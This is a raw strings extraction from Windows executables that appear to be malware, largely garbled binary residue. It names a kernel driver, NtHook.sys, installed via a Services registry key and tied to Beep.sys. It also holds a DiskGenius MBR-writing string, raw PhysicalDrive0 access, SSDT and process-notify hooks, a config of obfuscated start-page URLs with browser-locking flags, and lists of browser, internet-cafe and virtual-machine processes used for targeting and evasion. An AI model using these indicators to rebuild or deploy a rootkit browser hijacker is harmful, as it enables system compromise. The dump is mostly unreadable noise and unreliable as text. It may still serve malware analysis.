<!<&<,<3<8<A<F<L<S<X<a<f<l<s<x<
=!=&=,=3=8=A=F=L=S=X=a=f=l=s=x=
>!>&>,>3>8>A>F>L>S>X>a>f>l>s>x>
?!?&?,?3?8?A?F?L?S?X?a?f?l?s?x?
0!0&0,03080A0F0L0S0X0a0f0l0s0x0
1!1&1,13181A1F1L1S1X1a1f1l1s1x1
2!2&2,23282A2F2L2S2X2a2f2l2s2x2
3!3&3,33383A3F3L3S3X3a3f3l3s3x3
4!4&4,43484A4F4L4S4X4a4f4l4s4x4
5!5&5,53585A5F5L5S5X5a5f5l5s5x5
6!6&6,63686A6F6L6S6X6a6f6l6s6x6
7!7&7,73787A7F7L7S7X7a7f7l7s7x7
8!8&8,83888A8F8L8S8X8a8f8l8s8x8
9!9&9,93989A9F9L9S9X9a9f9l9s9x9
:!:&:,:3:8:A:F:L:S:X:a:f:l:s:x:
;!;&;,;3;8;A;F;L;S;X;a;f;l;s;x;
<!<&<,<3<8<A<F<L<S<X<a<f<l<s<x<
=!=&=,=3=8=A=F=L=S=X=a=f=l=s=x=
>!>&>,>3>8>A>F>L>S>X>a>f>l>s>x>
?!?&?,?3?8?A?F?L?S?X?a?f?l?s?x?
0!0&0,03080A0F0L0S0X0a0f0l0s0x0
1!1&1,13181A1F1L1S1X1a1f1l1s1x1
2!2&2,23282A2F2L2S2X2a2f2l2s2x2
3!3&3,33383A3F3L3S3X3a3f3l3s3x3
4!4&4,43484A4F4L4S4X4a4f4l4s4x4
5!5&5,53585A5F5L5S5X5a5f5l5s5x5
6!6&6,63686A6F6L6S6X6a6f6l6s6x6
7!7&7,73787A7F7L7S7X7a7f7l7s7x7
8!8&8,83888A8F8L8S8X8a8f8l8s8x8
9!9&9,93989A9F9L9S9X9a9f9l9s9x9
:!:&:,:3:8:A:F:L:S:X:a:f:l:s:x:
;!;&;,;3;8;A;F;L;S;X;a;f;l;s;x;
<!<&<,<3<8<A<F<L<S<X<a<f<l<s<x<
=!=&=,=3=8=A=F=L=S=X=a=f=l=s=x=
>!>&>,>3>8>A>F>L>S>X>a>f>l>s>x>
?!?&?,?3?8?A?F?L?S?X?a?f?l?s?x?
0!0&0,03080A0F0L0S0X0a0f0l0s0x0
1!1&1,13181A1F1L1S1X1a1f1l1s1x1
2!2&2,23282A2F2L2S2X2a2f2l2s2x2
3!3&3,33383A3F3L3S3X3a3f3l3s3x3
4!4&4,43484A4F4L4S4X4a4f4l4s4x4
5!5&5,53585A5F5L5S5X5a5f5l5s5x5
6!6&6,63686A6F6L6S6X6a6f6l6s6x6
7!7&7,73787A7F7L7S7X7a7f7l7s7x7
8!8&8,83888A8F8L8S8X8a8f8l8s8x8
9!9&9,93989A9F9L9S9X9a9f9l9s9x9
:!:&:,:3:8:A:F:L:S:X:a:f:l:s:x:
;!;&;,;3;8;A;F;L;S;X;a;f;l;s;x;
<!<&<,<3<8<A<F<L<S<X<a<f<l<s<x<
=!=&=,=3=8=A=F=L=S=X=a=f=l=s=x=
>!>&>,>3>8>A>F>L>S>X>a>f>l>s>x>
?!?&?,?3?8?A?F?L?S?X?a?f?l?s?x?
0!0&0,03080A0F0L0S0X0a0f0l0s0x0
1!1&1,13181A1F1L1S1X1a1f1l1s1x1
2!2&2,23282A2F2L2S2X2a2f2l2s2x2
3!3&3,33383A3F3L3S3X3a3f3l3s3x3
4!4&4,43484A4F4L4S4X4a4f4l4s4x4
5!5&5,53585A5F5L5S5X5a5f5l5s5x5
6!6&6,63686A6F6L6S6X6a6f6l6s6x6
7!7&7,73787A7F7L7S7X7a7f7l7s7x7
8!8&8,83888A8F8L8S8X8a8f8l8s8x8
9!9&9,93989A9F9L9S9X9a9f9l9s9x9
:!:&:,:3:8:A:F:L:S:X:a:f:l:s:x:
;!;&;,;3;8;A;F;L;S;X;a;f;l;s;x;
<!<&<,<3<8<A<F<L<S<X<a<f<l<s<x<
=!=&=,=3=8=A=F=L=S=X=a=f=l=s=x=
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
>P?\?h?t?
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=
84888<8@8
= =$=(=8=<=@=<>@>D>
?$?(?8?<?@?D?L?d?t?x?
0 0(0@0P0T0d0h0p0
1,10181P1`1d1t1x1|1
2 282H2L2T2l2|2
3(3,3<3@3H3`3p3t3
4 4(4@4P4T4d4h4p4
5(5,5<5@5D5L5d5t5x5
5(6H6h6
7(747P7\7x7
888T8X8x8
989D9\9`9|9
: :@:`:h:p:x:
; ;D;P;X;
<,<H<L<\<d<x<
=L=P=p=
>P>l>p>
0$0T0X0h0
1 1,141d1x1
2(202<2\2h2
383D3d3p3
4 4@4L4l4t4
545<5D5P5p5|5
6 6,6d6x6
@4D4\4`4
:$:,:4:<:D:L:T:\:d:l:t:|:
(080H0X0h0
1$1,141<1D1L1T1\1d1l1t1|1
2 2$2(2,2024282@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3 3$303
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
;t=x=|=
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>
?$?D?d?
0,0L0h0
Invalid partition tableMissing operating system
Master Boot Record Wrote by MBR By DiskGenius
strchr
RtlUnicodeStringToAnsiString
RtlInitUnicodeString
_strnset
memcpy
MmGetSystemRoutineAddress
MmIsAddressValid
RtlCompareString
RtlInitString
ZwClose
ZwMapViewOfSection
ZwCreateSection
ZwOpenFile
KeServiceDescriptorTable
KeAddSystemServiceTable
ExFreePoolWithTag
ZwQuerySystemInformation
ExAllocatePool
memset
KeDetachProcess
KeAttachProcess
PsLookupProcessByProcessId
strstr
_wcsnicmp
RtlEqualUnicodeString
KeSetEvent
KeWaitForSingleObject
ZwSetValueKey
ZwCreateKey
ZwQueryValueKey
ZwOpenKey
wcsstr
_wcslwr
_wcsnset
ZwReadFile
ZwQueryInformationFile
ZwCreateFile
RtlCompareMemory
ZwWriteFile
RtlFreeAnsiString
ObfDereferenceObject
RtlAppendUnicodeStringToString
RtlCopyUnicodeString
RtlVolumeDeviceToDosName
ObReferenceObjectByPointer
ObReferenceObjectByHandle
PsSetCreateProcessNotifyRoutine
ObReferenceObjectByName
IoDriverObjectType
IoFreeIrp
IoFreeMdl
MmUnlockPages
IofCallDriver
KeInitializeEvent
IoBuildAsynchronousFsdRequest
RtlFreeUnicodeString
IoBuildDeviceIoControlRequest
IoGetDeviceObjectPointer
ZwPulseEvent
ZwAllocateVirtualMemory
ObOpenObjectByPointer
ProbeForRead
IoGetCurrentProcess
_strupr
PsGetProcessImageFileName
_wcsupr
PsRemoveLoadImageNotifyRoutine
PsSetLoadImageNotifyRoutine
PsGetVersion
KeDelayExecutionThread
IofCompleteRequest
ExEventObjectType
MmMapIoSpace
MmGetPhysicalAddress
PsCreateSystemThread
IoDeleteDevice
IoCreateSymbolicLink
IoCreateDevice
DbgPrint
KeTickCount
KeBugCheckEx
ntoskrnl.exe
RtlUnwind
KeGetCurrentIrql
HAL.dll
1'1B1I1x1
2$3B3i3
5*545=5L5V5_5n5x5
8�868F8a8
<*<5<@<L<R<W<
?(?d?p?
0'0=0C0r0y0
1 1'1\1c1
2L2i2}2
3.3E3\3
8!8E8n8
8,9;9J9d9q9
:*:;:E:j:t:
;0;E;P;_;p;
< <H<`<
=*=E=q=
=�>7>A>V>k>}>
+03090
1*1Z1d1
2+3M3z3
3Y4i4v4
9!:0:|:
:!;3;M;
<.<3<><D<I<Z<j<U=
>!>0>>>F>S>b>p>x>
?*?8?@?M?\?j?{?
0�0%0-060>0E0R0_0n0t0|0
1$1-151<1I1V1e1k1v1
2%2=2I2O2_2m2
3!3)323<3B3w3~3
484R4^4d4i4u4
5'515;5E5O5Y5c5m5w5
6!6+656?6I6Y6c6m6w6
7$7+757<7C7J7e7l7s7z7
9*9<9S9z9
:2;8;C;\;t;
<4<H<\<p<
=8=>=K=c={=
>#>;>O>c>w>
?'?@?F?T?}?
0.0F0\0s0
1$1)11171^1q1~1
1!2'202<2B2H2O2U2e2j2o2u2
3-373A3K3f3
4(4@4X4p4
5,5@5T5h5|5
6+646C6J6R6Z6l6u6
8/848R8v8
9 9&91999?9E9P9V9\9e9k9
<)<5=c=l=
4,404L4P4l4p4
5,505L5P5l5p5
2(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
0�0$0-040
[StartPageReg]
page=r
[lockie]
blockie=1
[lockreg]
blockreg=1
[startpage]
startpagenum=15
url_0=SPd]Z^bV@XlZ
process_0=r
url_1=[\N_]fcVdAYm[
process_1=r
url_2=]ZS\cTha^bfZhE]q_
process_2=r
url_3==A<`S=UiW
process_3=r
url_4=Q]QR\Qb`ifYgD\p^
process_4=r
url_5=PT^RT^h?WkY
process_5=r
url_6=WLdaV^^?WkY
process_6=r
url_7=^SQd]a\U@XlZ
process_7=r
url_8=Y[Q_O=UiW
process_8=r
url_9=MS^\[T>VjX
process_9=r
url_10=]LRN`X>VjX
process_10=r
url_11=XLbVUPd`dAYm[
process_11=r
url_12=^_^NdT\VdAYm[
process_12=r
url_13=;<AO`=UiW
process_13=r
url_14=MZ^NZ=UiW
process_14=r
[jmpurl]
jmpurlnum=0
[host]
hostnum=0
[URLLNK]
urlnum=5
filename_0=
url_0=r
iconfile_0=r
IconIndex_0=0
Folder_0=2
filename_1=
url_1=r
iconfile_1=r
IconIndex_1=0
Folder_1=1
filename_2=
url_2=r
iconfile_2=MEh]
IconIndex_2=0
Folder_2=3
filename_3=
url_3=r
iconfile_3=MEh]
IconIndex_3=0
Folder_3=2
filename_4=
url_4=r
iconfile_4=MEh]
IconIndex_4=0
Folder_4=1
[domain]
domainnum=0
[Allowdomain]
Allowdomainnum=0
[anti]
antinum=0
cbtnum=0
[dddd]
urlnum=0
[adad]
ADnum=0
!This program cannot be run in DOS mode.
`.rdata
@.data
@Ph#1@
CloseHandle
ExitProcess
GetCommandLineA
GetModuleHandleA
MultiByteToWideChar
WaitForSingleObject
kernel32.dll
CreateProcessWithLogonW
advapi32.dll
MainWinClass
Main Window
YH##!!%!
!()Kuw~
\]]abhn
rV77AC
!!(Ksw~
]]^bhm
#!((Kuw~
]]^bhm
!((Ksw~
]]abhm
!!(Kuw~
]]^bhm
!((Ku(~
]]^cjm
!!(Kuw~
]]abhq
!((Kuw~
]]abjq
!((Kuw}
]]^bjq
!!(Kuw~
]]abjq
!((Kuy~
\]]^dj
#!!KKuy
3,/7CC
!(()uy~
#EEMMISU
GGENT|
F" %(Kw~
2,/7CC
:+09P0
%%)Kuy
i1,/7CC
!%((w~
g1,/7CC
!%(Ku~~
i1,/7CC
!%)Ku{
i1,/7CC
!!%(Kw~
i1,/7A
!!')t{
\\]_dl
i1,/7CC
%'')t{
i1,/7CC
!%LJKx~
i2,47C
%!()t{
\\\_dl
i2,/7C
%!')v{
i22/7AC
%!')v{
o1,-6@B
%{{{{{{
SVSSVVV
EGWXXY
V7''7D
7@=LL<<<1
:;5R54><<<<1
389LRRRL
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
1>1D1L1V1}1
2)3T3v3~3
4T4c4k4
5;5A5]5y5
52686P6^6g6r6
6%7+7C7J7U7`7
858U8[8w8'9R9d9v9
:*:8:F:T:b:p:~:
<=<N<`<r<
>$?*?2?;?E?
d0j0s0
3 3W3e3y3
4<4`4~4
595L5m5s5
6*686H6N6]6f6m6
6+7K7]7
7T8Z8l8
9.949=9
:>:P:c:j:
;:;a;v;~;
<&<<<N<
1U2[2a2g2m2s2z2
3 3&3,3B3I3\3x3
4"4L4Z4`4
868;8J8S8`8k8}8
9"9(969=9B9K9X9^9x9
X0c0k0
3b3j3}3
4!464v4
696B6I6R6
747F7j7
8B8H8S8_8t8{8
9)939:9R9a9h9u9
:C:I:e:}:
<#<+<2<7<?<H<T<Y<^<d<h<n<s<y<~<
=!='=C=
0>0I0S0l0v0
3 323M3U3]3t3
3%464Y4
8T8f889B9O9j9q9
9�:%:H:
>$>)>/>
?$?E?K?}?
0&0N0g0
0<1B1e1j1
222:2E2T2]2r2
2 3)353n3w3
4�4'4,40444]4
6=6D6H6L6P6T6X6\6`6
9-9A9G9
;F;Q;_;d;i;n;~;
<L<Q<X<]<d<i<
>$>3>8>B>P>
-141:1
2 2+2[2
6Y7f9x9
< <$<(<,<0<4<~<
=#=(=,=0=Q={=
> >$>(>,>
1S1Y1}1
6#6W6b6
6I7V7Q8n8
1#1(11161<1C1H1Q1V1\1c1h1
t1x1|1
<(=H=d=h=p=t=
> >@>`>|>
? ?@?`?|?
3$3,343<3D3L3T3\3d3
9(989\9h9l9p9t9x9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
hbztrljebwuomgeywrojhbztrljebwuo
mscoree.dll
KERNEL32.DLL
((((( H
h(((( H
H
Netapi32.dll
Kernel32.dll
ntdll.dll
SYSTEM\CurrentControlSet\Services\
ImagePath
DisplayName
ErrorControl
Administrators
C:\temp\CreateProcess.exe
C:\Windows\System32\dw.ini
PUBWINCLIENT.EXE
FZCLIENT.EXE
BARCLIENT.EXE
CLSMN.EXE
CLIMN.EXE
SICENT.EXE
TLNBCLT.EXE
TLNBLDR.EXE
TLNBSRV.EXE
NBLASSIST.EXE
CLIENT.EXE
WXCLTAID.EXE
WBJFSYS.EXE
MKSERVER.EXE
MKDBRESTORE.EXE
FKCLIENT.EXE
MKCLIENT.EXE
NXPRUN.EXE
HINTCLIENT.EXE
SAFECENTER.EXE
SERVICESMANAGER.EXE
VBOXTRAY.EXE
VBOXSERVICE.EXE
VMWAREUSER.EXE
VMWARYTRAY.EXE
VMUPGRADEHELPER.EXE
VMTOOLSD.EXE
VMACTHLP.EXE
C:\Temp\
C:\temp\CreateProcess.exe
ups_run
C:\Temp\i_
ups_ins
ups_run
C:\windows\system32\ipconfig.exe /release
ups_ins
C:\Temp\NtHook.sys
SeDebugPrivilege
\Registry\Machine\SYSTEM\CurrentControlSet\Services\
NtHook
SeLoadDriverPrivilege
seclogon
C:\windows\system32\ipconfig.exe /renew
\??\C:\Windows\System32\ntdll.dll
\??\C:\windows\
\??\C:\Windows\System32\Drivers\NtHook.sys
\Registry\Machine\SYSTEM\CurrentControlSet\services\NtHook
ImagePath
System32\Drivers\Beep.sys
\Registry\Machine\SYSTEM\CurrentControlSet\services\Beep
System32\Drivers\NtHook.sys
ErrorControl
DisplayName
NtHook
PsSetCreateProcessNotifyRoutine
\Driver\Disk
START PAGE
startpagexxx
\??\C:\Windows\System32\drivers\NtHook.sys
\??\C:\Windows\System32\drivers\beep.sys
\Device\Ip
\CORAL.EXE
\115BR.EXE
\TTRAVELER.EXE
\NAVIGATOR.EXE
\SAFARI.EXE
\CHROME.EXE
\OPERA.EXE
\THEWORLD.EXE
\MAXTHON.EXE
\FIREFOX.EXE
\GREENBROWSER.EXE
\360SE.EXE
\SOGOUEXPLORER.EXE
\QQBROWSER.EXE
\IEXPLORE.EXE
\EXPLORER.EXE
\SERVICES.EXE
\??\C:\Windows\System32\safemon.dll
\DosDevices\NtHook
\Device\devNtHook
startpagexxx
\Registry\Machine\SYSTEM\CurrentControlSet\services\NtHook
$&\??\PhysicalDrive0
\??\CdRom0
\Driver\Disk
ErrorControl
DisplayName
NtHook
ImagePath
\Registry\Machine\SYSTEM\CurrentControlSet\services\NtHook
System32\Drivers\NtHook.sys
\??\C:\Windows\System32\Drivers\NtHook.sys
jjjjjj
jjjjjj
jjjjjj
jjjjjj
jjjjjjj
(null)
KERNEL32.DLL
mscoree.dll
